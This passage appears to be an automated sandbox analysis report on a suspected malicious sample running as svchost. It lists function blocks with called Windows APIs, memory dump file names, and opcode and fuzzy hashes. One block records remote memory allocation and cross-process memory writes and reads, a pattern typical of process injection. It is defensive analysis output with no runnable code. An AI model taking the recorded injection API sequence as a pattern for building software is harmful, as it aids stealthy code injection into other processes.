          • HeapFree.KERNEL32(?,?,?,?,?,00000000,?,?,0000000140007F7E), ref: 000000014000AEF5
          • HeapFree.KERNEL32(?,?,?,?,?,00000000,?,?,0000000140007F7E), ref: 000000014000AF25
          Memory Dump Source
          • Source File: 00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
          • Associated: 00000008.00000002.2670006751.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670055662.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670071798.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670101099.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_8_2_140000000_svchost.jbxd
          Yara matches
          Similarity
          • API ID: FreeHeap
          • String ID:
          • API String ID: 3298025750-0
          • Opcode ID: 408a02f4f63ab91fc5187f14d3dcb37b4e722448c365077d34190373d3d5f0ce
          • Instruction ID: d4d1870c5087a67c0966be97a260029823248e973845292b3bb07a60e1b23ddb
          • Opcode Fuzzy Hash: 408a02f4f63ab91fc5187f14d3dcb37b4e722448c365077d34190373d3d5f0ce
          • Instruction Fuzzy Hash: 7D517CB2201B8586EA52DB56F8403DA63E5F789BD4F448015AF8E47B69CF3CC846C740
          APIs
          Strings
          Memory Dump Source
          • Source File: 00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
          • Associated: 00000008.00000002.2670006751.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670055662.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670071798.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670101099.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_8_2_140000000_svchost.jbxd
          Yara matches
          Similarity
          • API ID: FreeHeapmemset
          • String ID: 0
          • API String ID: 2097932597-4108050209
          • Opcode ID: d608044e64b780387b2c7aa90c8eb0b27a45091dae120e6ad878195193090760
          • Instruction ID: 5a9c4f64bc53c3310fbde631ad91d9e498651b06d97f63ba4cdee06702fb0fd3
          • Opcode Fuzzy Hash: d608044e64b780387b2c7aa90c8eb0b27a45091dae120e6ad878195193090760
          • Instruction Fuzzy Hash: 4C910CB2310A8586EB61CF26E8543ED67A0FB88FC9F549026EB4D47B68DF39C549C740
          APIs
          Memory Dump Source
          • Source File: 00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
          • Associated: 00000008.00000002.2670006751.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670055662.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670071798.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670101099.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_8_2_140000000_svchost.jbxd
          Yara matches
          Similarity
          • API ID: AddressProc$memcpymemset
          • String ID:
          • API String ID: 2623457122-0
          • Opcode ID: 80d22dda9c92a7dc3ff39ece2696b542829985d415a44d4f58619847b4434d21
          • Instruction ID: 70dbe746bec5ee3447c0d7f353d4dfd784e5f219e21c1097a21de84af56b6886
          • Opcode Fuzzy Hash: 80d22dda9c92a7dc3ff39ece2696b542829985d415a44d4f58619847b4434d21
          • Instruction Fuzzy Hash: C9514736311B4182EB52DB16E8903EA23A1F78CBD4F44422AEB9D477B4DF39C449C740
          APIs
          Memory Dump Source
          • Source File: 00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
          • Associated: 00000008.00000002.2670006751.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670055662.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670071798.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670101099.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_8_2_140000000_svchost.jbxd
          Yara matches
          Similarity
          • API ID: FreeHeap$??2@??3@memset
          • String ID:
          • API String ID: 987703202-0
          • Opcode ID: 4066fb4ad796096cb4f0aa9e0f7ccb1a1a05eebd38f039e7280e541ce6032752
          • Instruction ID: 56bfb0d7c4714fc23e3e49edf08900e61e95882cce72991227d767f54d68e605
          • Opcode Fuzzy Hash: 4066fb4ad796096cb4f0aa9e0f7ccb1a1a05eebd38f039e7280e541ce6032752
          • Instruction Fuzzy Hash: F5419772201B8581EB729F27B8103EB63A5FB8DBC4F444125EF495B7AAEE39C845C740
          APIs
          Memory Dump Source
          • Source File: 00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
          • Associated: 00000008.00000002.2670006751.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670055662.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670071798.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670101099.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_8_2_140000000_svchost.jbxd
          Yara matches
          Similarity
          • API ID: ByteCharMultiWide$AddressFreeHeapProcmemset
          • String ID:
          • API String ID: 1855896800-0
          • Opcode ID: 2b06c8bbf3553aec2115b7400860299f7851679e21e5d390be81bfaf3dcb26c1
          • Instruction ID: e3fb2f7e366e748dc6d962b2961083894d0ca4f4d749cc2a9cf1ff3c065c6bc7
          • Opcode Fuzzy Hash: 2b06c8bbf3553aec2115b7400860299f7851679e21e5d390be81bfaf3dcb26c1
          • Instruction Fuzzy Hash: 37414B72204BC185EA61DB16A8507DB63A0F78DBC5F444129EF9D4BBAADF39C505CB00
          APIs
          Memory Dump Source
          • Source File: 00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
          • Associated: 00000008.00000002.2670006751.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670055662.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670071798.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670101099.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_8_2_140000000_svchost.jbxd
          Yara matches
          Similarity
          • API ID: ??2@FreeHeap_time64memset
          • String ID:
          • API String ID: 665068314-0
          • Opcode ID: 8b74649592698774aa04cc3df794b495fdbb369b225488a8c13f1aa0cbf406a8
          • Instruction ID: 3b41cf12a1854ee51030ad2dfde3dce9ab56220ab60abe65fc2278721d7e4742
          • Opcode Fuzzy Hash: 8b74649592698774aa04cc3df794b495fdbb369b225488a8c13f1aa0cbf406a8
          • Instruction Fuzzy Hash: 4C4117B6205B8582EB66CF52B4103EA63A4FB88BC0F594126BB89477A6DF38C841C744
          APIs
          Memory Dump Source
          • Source File: 00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
          • Associated: 00000008.00000002.2670006751.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670055662.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670071798.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670101099.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_8_2_140000000_svchost.jbxd
          Yara matches
          Similarity
          • API ID: AddressErrorFreeHeapLastLibraryLoadProcmemset
          • String ID:
          • API String ID: 3226096620-0
          • Opcode ID: d1715fdb5dddd0d251813e7f8691ff23fd2f0f614da14f1e4099650b5e5ebb2c
          • Instruction ID: 4ed53ce331cc876d90759824a61a266281903749b9815567c4f8bf6b8516744d
          • Opcode Fuzzy Hash: d1715fdb5dddd0d251813e7f8691ff23fd2f0f614da14f1e4099650b5e5ebb2c
          • Instruction Fuzzy Hash: FE314BB1205AC184EA62DF13B8407EB63A0BB8DBC5F444025EF8D577A6EE39C445CB40
          APIs
          Strings
          Memory Dump Source
          • Source File: 00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
          • Associated: 00000008.00000002.2670006751.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670055662.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670071798.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670101099.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_8_2_140000000_svchost.jbxd
          Yara matches
          Similarity
          • API ID: rand$FreeHeap
          • String ID: yxxx
          • API String ID: 3257490382-3567846162
          • Opcode ID: 1ed65ebdc0ce8e4ce5d2a64fe317f14d270a0097822f3f55ffc6e5b95df04c10
          • Instruction ID: 68e9f63343866e12a90d5f998d2b8139de06248d58b94c3f77e5065cd01b016c
          • Opcode Fuzzy Hash: 1ed65ebdc0ce8e4ce5d2a64fe317f14d270a0097822f3f55ffc6e5b95df04c10
          • Instruction Fuzzy Hash: 9C21E7B2710A4086D756DB17B8103DA66E5F78E7D4F4A9115FF4A0B769EF3CC8808340
          APIs
          Memory Dump Source
          • Source File: 00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
          • Associated: 00000008.00000002.2670006751.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670055662.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670071798.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670101099.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_8_2_140000000_svchost.jbxd
          Yara matches
          Similarity
          • API ID: Free$String$??3@Heap
          • String ID:
          • API String ID: 4235498366-0
          • Opcode ID: c12198bd40917f41d5f87fff9c6930f7040eddc6234b709b1659fba2cdf50f37
          • Instruction ID: f05e54370569ffaa4172b8e709ae349b72a04d2577a779893dc1ca082f76694d
          • Opcode Fuzzy Hash: c12198bd40917f41d5f87fff9c6930f7040eddc6234b709b1659fba2cdf50f37
          • Instruction Fuzzy Hash: 36110376204B8086EB56DF52E9903A9B3B4F788FC4F185116EF8A07B69CF39C891C741
          APIs
          • VirtualAllocEx.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,00000000), ref: 0000000140012116
            • Part of subcall function 0000000140013B50: WriteProcessMemory.KERNEL32 ref: 0000000140013BB8
          • HeapFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,00000000), ref: 000000014001238C
            • Part of subcall function 0000000140013B00: ReadProcessMemory.KERNEL32 ref: 0000000140013B25
          Strings
          Memory Dump Source
          • Source File: 00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
          • Associated: 00000008.00000002.2670006751.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670055662.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670071798.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670101099.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_8_2_140000000_svchost.jbxd
          Yara matches
          Similarity
          • API ID: MemoryProcess$AllocFreeHeapReadVirtualWrite
          • String ID: @
          • API String ID: 3931978661-2766056989
          • Opcode ID: ccd70a0ca5a4c560fc92debafb302037228b4baa55aaef678cfa11071513d053
          • Instruction ID: 49d5038374c617281847cfa8613ef8dafcb7c1c33cb977380acacb8086e307ba
          • Opcode Fuzzy Hash: ccd70a0ca5a4c560fc92debafb302037228b4baa55aaef678cfa11071513d053
          • Instruction Fuzzy Hash: 97A12676205BC085EB629B27E4507EE67A0F788BC4F088425EF8D5BB69EF39C555CB00
          APIs
          Memory Dump Source
          • Source File: 00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
          • Associated: 00000008.00000002.2670006751.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670055662.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670071798.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670101099.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_8_2_140000000_svchost.jbxd
          Yara matches
          Similarity
          • API ID: Heap$AddressProc$Free$AllocateCreateFileInstanceLibraryLoadModuleNameProcessmemcpymemset
          • String ID:
          • API String ID: 1287873503-0
          • Opcode ID: 2d1c915d3e61f1fb7c3c85f5494a43be86836c671b25dc83c622586cc8eb53fa
          • Instruction ID: efac56c58761c5b53cd2b935686c719a5323fa47eacfc037fad2ad30534b96ad
          • Opcode Fuzzy Hash: 2d1c915d3e61f1fb7c3c85f5494a43be86836c671b25dc83c622586cc8eb53fa
          • Instruction Fuzzy Hash: DD228FB5700B8585EB62DF22E8503EA23A0F789BD8F448166EB5D477B6DF38C909C744
          APIs
          Memory Dump Source
          • Source File: 00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
          • Associated: 00000008.00000002.2670006751.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670055662.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670071798.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670101099.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_8_2_140000000_svchost.jbxd
          Yara matches
          Similarity
          • API ID: FreeHeap$memset
          • String ID:
          • API String ID: 631287834-0
          • Opcode ID: 5f052656b4539390a674b9cd562996d9c182f8e0918825306dd2bf5ae976865b
          • Instruction ID: 0399d008ca01f3e7ae8c4d26418939d543f2c779a5219281a3e46e336b9b5677
          • Opcode Fuzzy Hash: 5f052656b4539390a674b9cd562996d9c182f8e0918825306dd2bf5ae976865b
          • Instruction Fuzzy Hash: 53E1C0B660468281EB62DB23F4407EB67A1F798BC8F544026FF8947BA9DB39C941C740
          APIs
          Strings
          Memory Dump Source
          • Source File: 00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
          • Associated: 00000008.00000002.2670006751.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670055662.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670071798.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670101099.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_8_2_140000000_svchost.jbxd
          Yara matches
          Similarity
          • API ID: FreeMemoryProcessVirtualWrite
          • String ID: @
          • API String ID: 2227173347-2766056989
          • Opcode ID: 9a413e4547a8f19bf2b71c811f9e043220cfa0b658f72ae18e561b0f4f9a5e0c
          • Instruction ID: 55d91dff6a088f6984b8b652fa138d81b5292368ccde077922b963bfd0e4f872
          • Opcode Fuzzy Hash: 9a413e4547a8f19bf2b71c811f9e043220cfa0b658f72ae18e561b0f4f9a5e0c
          • Instruction Fuzzy Hash: 47113536308B9081EB618B07A85479AA7A4F78CFD0F488025EF8C87B69EF39C145CB00
          Memory Dump Source
          • Source File: 00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
          • Associated: 00000008.00000002.2670006751.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670055662.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670071798.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670101099.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_8_2_140000000_svchost.jbxd
          Yara matches
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: ef001dc6a8a34588974efeeab15473d05159a0728a0990e54c085eaf818c73d9
          • Instruction ID: abf0167f26eaa8b1341e4727f4fb40882108a042724cd5bbc7dba3d4017e7680
          • Opcode Fuzzy Hash: ef001dc6a8a34588974efeeab15473d05159a0728a0990e54c085eaf818c73d9
          • Instruction Fuzzy Hash: 47A16EB6215A8085EB62CF27E8447EE67A1F788BC8F14402AEF4D477A9EF39C545C740
          APIs
          Memory Dump Source
          • Source File: 00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
          • Associated: 00000008.00000002.2670006751.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670055662.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670071798.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670101099.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_8_2_140000000_svchost.jbxd
          Yara matches
          Similarity
          • API ID: FreeHeap
          • String ID:
          • API String ID: 3298025750-0
          • Opcode ID: b108f9f4a893c3e12e67817eb476791b24ba81c44ca3d0697336e7036c249844
          • Instruction ID: f58b36fc4f80b02d6db5818868401dd8c31dbbb25ea06bc06c998337cc310218
          • Opcode Fuzzy Hash: b108f9f4a893c3e12e67817eb476791b24ba81c44ca3d0697336e7036c249844
          • Instruction Fuzzy Hash: B951C3B5701B8281EB63CB13B4147EB22A5FB89BC8F188024FF4D57BA6DE39C9059744
          APIs
          Memory Dump Source
          • Source File: 00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
          • Associated: 00000008.00000002.2670006751.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670055662.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670071798.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670101099.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_8_2_140000000_svchost.jbxd
          Yara matches
          Similarity
          • API ID: FreeHeapmemcpy
          • String ID:
          • API String ID: 673829100-0
          • Opcode ID: 72da0d61fca60a9855a74ed57a38a50fbf2db88a5ba32426b899817a34a2c748
          • Instruction ID: c92d060d941fca04b38797fdd340357e26ec207b449130a56d7bb1cc0a947dbe
          • Opcode Fuzzy Hash: 72da0d61fca60a9855a74ed57a38a50fbf2db88a5ba32426b899817a34a2c748
          • Instruction Fuzzy Hash: 73418E35600B8181EB129B2398503EA62A1FB8CBD8F94C119EF5E5B7B5DF3ACD85C740
          APIs
          Memory Dump Source
          • Source File: 00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
          • Associated: 00000008.00000002.2670006751.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670055662.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670071798.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670101099.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_8_2_140000000_svchost.jbxd
          Yara matches
          Similarity
          • API ID: FreeHeap$memcpy
          • String ID:
          • API String ID: 1887603139-0
          • Opcode ID: e115f566d86e52d7b676b8586eccf910824452cc7cf57d3d669636780f8eff8e
          • Instruction ID: b21d00c09a7a7cebf341c700073de6dca50953cd70a54a6fcbc8b966eb336d55
          • Opcode Fuzzy Hash: e115f566d86e52d7b676b8586eccf910824452cc7cf57d3d669636780f8eff8e
          • Instruction Fuzzy Hash: D7416C76204B8586EB66CF27E8007DA77A4F788BD4F488016AF4C477A9DF38C945CB40